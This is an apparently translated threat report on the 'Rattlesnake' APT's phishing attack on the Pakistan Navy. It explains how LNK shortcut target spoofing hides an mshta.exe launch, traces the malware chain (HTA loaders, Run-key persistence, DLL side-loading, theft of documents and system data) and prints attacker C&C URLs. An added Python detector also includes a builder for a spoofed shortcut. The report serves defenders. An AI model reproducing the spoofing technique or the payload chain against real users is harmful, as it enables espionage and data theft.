The Eagle
APT organization "Rattlesnake" attack report on Pakistan (Navy)
2019-10-29
Rising Security Research Institute has recently captured, through the Rising Threat Intelligence System, another attack by the well-known APT group "Rattlesnake". This time the target was the Pakistan Navy. The method differs from the group's earlier attacks on China, but the core is the same: the ultimate goal is to steal confidential information from the government, energy, military, mining and other sectors.
First, the background
Rising security experts note that the "Rattlesnake" group's earlier attacks on China used the Office remote code execution vulnerability CVE-2017-11882: a bait document carrying malware was delivered by phishing e-mail, after which internal data such as system information, installed programs and disk information were stolen from the victim's computer.
Figure: Attacks on China
The attack on Pakistan used a new LNK file path target hijacking technique. Forged shortcut files were delivered by e-mail or other means, disguised as a press release from the Pakistan Navy's public relations bureau on the talks between the Indian and Chinese leaders, to induce the victim to click. Once the user opens the shortcut, the malware is downloaded and the file information on the computer is stolen.
Photo: Attack on Pakistan
Because the "Rattlesnake" group has consistently targeted confidential information in the government, military and science and technology sectors, and has launched similar attacks against China's military and national defence, users in the relevant organisations should stay vigilant against this kind of attack.
Second, the attack event
The attack targeted Pakistan: the attacker disguised the bait document as a press release from the Pakistan Navy's public relations bureau, recording the points discussed by Indian Prime Minister Modi and Chinese President Xi Jinping.
Figure: Bait document
Third, technical analysis
3.1 Analysis of malicious LNK files
1. The malicious LNK file uses a new technique to hide the program it actually executes. The shortcut is named "Key_Points.doc.lnk". In the link target, the application shown is cftmo.exe, with the parameter: http://www.paknavy[.]gov.pk.ap1-port.net/images/E7B62E1D/1182/2258/fc8fe2b4/692cd02.
Figure: "Rattlesnake" Shell Link File
In actual execution, however, the Link file ends up running mshta.exe from System32, and mshta downloads and executes the malicious script at the specified URL.
Figure: Link file execution mshta.exe
Analysing this behaviour, Rising security researchers found that the LNK file was constructed in a new way that hides the real target program; we call this Link file path target hijacking. The technique is broken down in detail below.
2.Link file path target hijacking
ShellLinkHeader:
The LNK file begins with a ShellLinkHeader, which carries identification information, timestamps and the LinkFlags that record which optional structures follow it (layout per MS-SHLLINK, 76 bytes in total):
struct ShellLinkHeader {
    uint32_t HeaderSize;        // always 0x4C
    uint32_t LinkCLSID[4];      // 00021401-0000-0000-C000-000000000046
    uint32_t LinkFlags;         // which optional structures are present (e.g. HasLinkTargetIDList, HasExpString)
    uint32_t FileAttributes;
    uint32_t CreationTime[2];   // FILETIME
    uint32_t AccessTime[2];     // FILETIME
    uint32_t WriteTime[2];      // FILETIME
    uint32_t FileSize;
    uint32_t IconIndex;
    uint32_t ShowCommand;
    uint16_t HotKey;
    uint16_t Reserved1;
    uint32_t Reserved2;
    uint32_t Reserved3;
};
EnvironmentVariableDataBlock:
The LinkFlags member of the ShellLinkHeader describes the LNK and which optional structures it contains. One of its bits, HasExpString, indicates whether the LNK carries an EnvironmentVariableDataBlock.
When the shortcut's target path contains an environment variable, this block is present and holds the target program path with the environment variable unexpanded.
LinkTargetIDList:
This structure specifies the shortcut's target path and consists of a list of ItemIDs.
Each ItemID identifies one level of the namespace in which the target resides. The number of ItemIDs is determined by the depth of the target path, and the last ItemID identifies the final executable name.
Figure: LinkTargetIDList structure
Two members of the ItemID structure are relevant to the path: PrimaryName and ExtraDataBlock. The internal layout of ItemIDs is not described in detail in Microsoft's official documentation.
Target hijacking analysis:
When the operating system displays the shortcut's properties, the target path it shows depends on the HasExpString flag. If HasExpString is not set, the system assembles the target path from the LinkTargetIDList; if it is set, the system reads TargetUnicode from the EnvironmentVariableDataBlock, expands the environment variables and displays that.
If HasExpString is set and TargetUnicode in the EnvironmentVariableDataBlock names a program that does not exist, then when the LNK is double-clicked the system falls back to the LinkTargetIDList to obtain the path and checks whether that target exists; if it does, that path is used for the final execution. When the user right-clicks and views Properties, however, the system shows the path from the EnvironmentVariableDataBlock first and does not check whether the program exists. This is what makes the LNK target hijacking possible.
On its own, this hijacking does not persist. After the double-click execution the system clears HasExpString in the LNK file, and the target path shown in Properties reverts to the actual target from the LinkTargetIDList, so the displayed target path changes after the first run.
In the sample delivered by Rattlesnake, the hijacked target path was not modified after execution. Further analysis showed that to make the hijacking persistent, the PrimaryName value in the last item of the IDList must also be modified. Normally the PrimaryName and the ExtraDataBlock of an ItemID hold the same name. If the executable name in PrimaryName matches the program name in the EnvironmentVariableDataBlock, the system treats the LNK as normal and does not rewrite it after execution. So as long as the program name in the EnvironmentVariableDataBlock path matches the PrimaryName of the last ItemID, and that program does not exist, the hijacking works and persists.
3.Key_Points.doc.lnk file analysis
In the Link file used in this Rattlesnake attack, a disguised link path (%windir%\system32\cftmo.exe) is used to mask the target the system actually executes (%windir%\system32\mshta.exe).
Binary analysis shows that the link target was written as a path containing an environment variable, which causes the ExtraData section to carry an EnvironmentVariableDataBlock. In that block, TargetUnicode is what the Properties dialog displays for an environment-variable path, so the malicious Link file achieves the disguise simply by modifying the TargetUnicode field.
Modifying TargetUnicode alone is enough to spoof the displayed target, because the system goes to the ExtraDataBlock of the IDList to obtain the actual execution path. The Shell Link used by Rattlesnake additionally modified PrimaryName so that PrimaryName and TargetUnicode both read cftmo.exe. When the system runs the Link file, its path consistency check sees PrimaryName matching TargetUnicode and leaves the file untouched, so the target path hijacking persists.
Figure: Modified PrimaryName
The end result: when the file is inspected through Properties, the link target shown is the non-existent cftmo.exe, while the system actually launches mshta.exe from the maliciously constructed Link file, which contacts the C&C and downloads the JavaScript script 692cd02.hta.
Figure: "Disguise" Link
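The hijacking described in sections 2 and 3 above can be checked for mechanically by parsing the LNK and comparing the path the Properties dialog would display (TargetUnicode in the EnvironmentVariableDataBlock, used when HasExpString is set) with the file names embedded in the last item of the LinkTargetIDList. The following is an added example written for this page, not Rising's code and not from the sample. The ItemID name extraction is a string-scanning heuristic (ANSI primary name plus UTF-16 long name), because Microsoft does not document the ItemID layout; the LNK fixture built by build_lnk is constructed for the test, uses a simplified ItemID body, and the cftmo.exe / mshta.exe names and the placeholder URL are taken from the description above rather than from a captured file.

```python
"""Detect LNK target-path masquerading: displayed target (EnvironmentVariableDataBlock)
versus the names the last LinkTargetIDList item resolves to. Added example, not Rising's code."""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x1, 0x2
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x4, 0x8, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
HAS_EXP_STRING = 0x200
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
ENV_BLOCK_SIG, ENV_BLOCK_SIZE = 0xA0000001, 0x314   # 8 header + 260 TargetAnsi + 520 TargetUnicode
NAME_RE = re.compile(r"[A-Za-z0-9_\-]{1,64}\.[A-Za-z0-9]{2,4}")


def parse_lnk(data):
    """Walk ShellLinkHeader, LinkTargetIDList, LinkInfo, StringData and ExtraData."""
    hdr_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if hdr_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos, items = HEADER_SIZE, []
    if flags & HAS_LINK_TARGET_ID_LIST:
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos, end = pos + 2, pos + 2 + idlist_size
        while pos + 2 <= end:
            (item_size,) = struct.unpack_from("<H", data, pos)
            if item_size == 0:                                # TerminalID
                break
            items.append(data[pos + 2:pos + item_size])       # ItemID body without its size field
            pos += item_size
        pos = end
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]         # LinkInfoSize includes itself
    strings, width = {}, 2 if flags & IS_UNICODE else 1
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            raw = data[pos + 2:pos + 2 + count * width]
            strings[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count * width
    env_target = None
    while pos + 8 <= len(data):                               # ExtraData until TerminalBlock (size < 4)
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if sig == ENV_BLOCK_SIG and size == ENV_BLOCK_SIZE:
            uni = data[pos + 8 + 260:pos + 8 + 260 + 520]      # TargetUnicode, what Properties shows
            env_target = uni.decode("utf-16-le").split("\x00", 1)[0]
        pos += size
    return {"flags": flags, "items": items, "strings": strings, "env_target": env_target}


def names_in_item(item):
    """Heuristic: file names inside an ItemID, scanned as ANSI (PrimaryName) and as
    UTF-16LE at both byte alignments (the long name in the 0xBEEF0004 extension)."""
    found = set(NAME_RE.findall(item.decode("latin-1")))
    for off in (0, 1):
        found.update(NAME_RE.findall(item[off:].decode("utf-16-le", errors="replace")))
    return {n.lower() for n in found}


def check_target_masquerade(data):
    """Flag a LNK whose displayed target disagrees with the name(s) in the last ItemID."""
    lnk = parse_lnk(data)
    report = {"displayed": lnk["env_target"], "idlist_names": set(), "reasons": []}
    if lnk["flags"] & HAS_EXP_STRING and lnk["env_target"] and lnk["items"]:
        shown = lnk["env_target"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        names = names_in_item(lnk["items"][-1])
        report["idlist_names"] = names
        if shown not in names:                                 # non-persistent variant
            report["reasons"].append("displayed target %r is not named in the last ItemID" % shown)
        others = sorted(n for n in names if n != shown)        # persistent variant: PrimaryName patched
        if others:
            report["reasons"].append("last ItemID also names %s" % others)
    report["suspicious"] = bool(report["reasons"])
    return report


def build_lnk(displayed_target, primary_name, long_name, arguments=""):
    """Constructed test fixture, not a real sample. The ItemID body uses a simplified file-entry
    layout (class 0x32, zeroed size/date, attributes, ANSI primary name, then a cut-down
    0xBEEF0004 extension carrying the UTF-16 long name); Explorer-written items carry more fields."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_EXP_STRING | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags).ljust(HEADER_SIZE, b"\x00")
    body = bytes([0x32, 0]) + struct.pack("<IIH", 0, 0, 0x20) + primary_name.encode() + b"\x00"
    body += b"\x00" * (len(body) % 2)
    long_utf16 = long_name.encode("utf-16-le") + b"\x00\x00"
    body += struct.pack("<HHI", 8 + len(long_utf16), 3, 0xBEEF0004) + long_utf16
    idlist = struct.pack("<H", len(body) + 2) + body + b"\x00\x00"
    out = header + struct.pack("<H", len(idlist)) + idlist
    if arguments:
        out += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    out += struct.pack("<II", ENV_BLOCK_SIZE, ENV_BLOCK_SIG)
    out += displayed_target.encode().ljust(260, b"\x00") + displayed_target.encode("utf-16-le").ljust(520, b"\x00")
    return out + struct.pack("<I", 0)                          # TerminalBlock


if __name__ == "__main__":
    # Placeholder URL; the names mirror the case described in the text.
    sample = build_lnk(r"%windir%\system32\cftmo.exe", "cftmo.exe", "mshta.exe", "http://example.invalid/692cd02")
    print(check_target_masquerade(sample))
```

Two caveats when running this over real shortcuts: Explorer stores an 8.3 short name as PrimaryName, so a long file name such as "Microsoft Edge.lnk" next to "MICROS~1.LNK" will also trigger the second reason and should be treated as a triage signal rather than a verdict; and a LNK with HasExpString clear is not covered by this check at all, since in that case Properties and execution both use the LinkTargetIDList.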
3.2 Sample analysis: 692cd02.hta
692cd02.hta is a JavaScript script generated with the open-source tool DotNetToJScript; its main function is to execute a .NET DLL in memory. The script first decrypts LinkZip.dll and then invokes its pink method via reflection, passing four parameters: parameter 1 is the URL from which to download file.hta, parameter 2 is the URL to which antivirus information and exception errors are uploaded, parameter 3 is the encrypted content of the bait document, and parameter 4 is the bait document's file name.
Figure: Memory execution .NET dll
3.3 Sample Analysis: LinkZip.dll
LinkZip.dll is a .NET assembly whose main job is to download and execute file.hta and to open the bait document Key_Points.doc.
The following is the detailed process:
1. Decrypt the bait document data, save it as Key_Points.doc under %temp%, and open it. If this fails, the exception information is reported to the URL: http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true/true/.
Figure: Open the bait document
Figure: Reporting exception information
2. Report the name and status of the installed antivirus software to http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true/true/.
Figure: Reporting antivirus software
3. Visit the URL http://www.paknavy.gov.pk.ap1-port.net/cgi/b6c82f0f84/1182/2258/af0c8a9f/file.hta, fetch the file.hta data and write it to a randomly named file in the %temp% directory. If the fetch succeeds, the HTA is executed and then deleted. If it fails, the URL is retried up to 10 times; after more than 10 failures, the custom exception message "File-not-Written" is reported to http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true/true/.
Figure: Get file.hta data and execute
4. From file.hta onward, the attack methods are the same as those Rising reported in the earlier attacks on China.
Brief description of the attack process (for a detailed analysis, see http://it.rising.com.cn/dongtai/19639.html and http://it.rising.com.cn/dongtai/19655.html):
(1) file.hta is a JavaScript script generated with the open-source DotNetToJScript tool. Its main function is to decrypt StInstall.dll in memory, execute it, and invoke its pin method via reflection.
(2) StInstall.dll performs the malicious actions: 1) creates the working directory %programdata%\CommonsFiles; 2) copies the system file write.exe into the working directory and drops PROPSYS.dll, a randomly named .tmp file and write.exe.config there; 3) creates an autostart entry named Commons under Software\Microsoft\Windows\CurrentVersion\Run with the value C:\ProgramData\CommonsFiles\write.exe; 4) uses the "white plus black" (DLL side-loading) technique: the legitimate write.exe (white file) is run from the working directory and loads PROPSYS.dll (black file) from the same directory.
(3) PROPSYS.dll is a .NET DLL whose main function is to load the randomly named .tmp file from the same directory, which carries out the actual theft. The malware collects a large amount of user data, assembles it as JSON and stores it in plain text in the %appdata%\CommonsDat directory, in four kinds of files with the suffixes .fls, .flc, .sif and .err, each named as a random string plus the specific suffix.
Figure: stealing information files
The file with the suffix .fls records information about files with the extensions doc, docx, xls, xlsx, pdf, ppt and pptx:
    filePath     File name and path
    Complete     File transfer complete (flag)
    sentOffset   Size of the file data uploaded so far
Table: Information Record
The files with the suffix .sif mainly store system privilege information, system information, the file listings of 4 system directories, disk drive information and the list of installed software.
Figure: Information stored in the suffix .sif
The system privilege information has the format "privileges":{"IsInAdminGroup":"Yes/NO","IsAdminPrivilege":"Yes/NO"}.
The system information record format of the victim machine is: "sysInfo": {system information}.
Detailed system information is shown in the following table:
Figure: System Information
Continued: 1/2